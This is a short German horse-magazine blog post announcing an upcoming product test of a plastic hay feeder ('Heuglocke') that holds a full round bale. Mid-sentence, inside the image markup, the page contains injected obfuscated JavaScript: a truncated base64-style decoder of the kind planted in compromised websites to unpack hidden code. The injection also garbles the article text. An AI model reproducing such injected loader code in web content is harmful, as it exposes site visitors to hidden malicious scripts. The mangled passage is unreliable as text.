“Ding-Dong”: Die Heuglocke im Produkttest!

14. November 2016 | Von Redaktion | Kategorie: Aus der Redaktion
Wir testen demnächst die Heuglocke von JFC Deutschl<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand (Foto: Anke Klabunde).” width=”600″ height=”338″ />

Demnächst steht der Produkttest für eine Heuraufe bevor. Allerdings handelt es sich weniger um eine "traditionelle" Raufutterstation aus Metall oder Holz, sondern um eine "Heuglocke" aus Kunststoff. Sie erscheint uns deshalb so interessant, weil sie einen kompletten Rundballen fassen kann (aber natürlich nicht muss - kleinere Futtermengen lassen sich ebenfalls unterbringen), ein geringes Gewicht und daher ein einfaches Handling aufweist. Bei Bedarf lässt sie sich sogar recht einfach als mobile Heustation nutzen, d.h. die Standortfrage ist nicht mehr fix! Details in der Produktvorstellung, der Anwenderbericht folgt dann zeitversetzt zu einem späteren Zeitpunkt.

Tags: , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=135946

Hier klicken, um einen Kommentar zu schreiben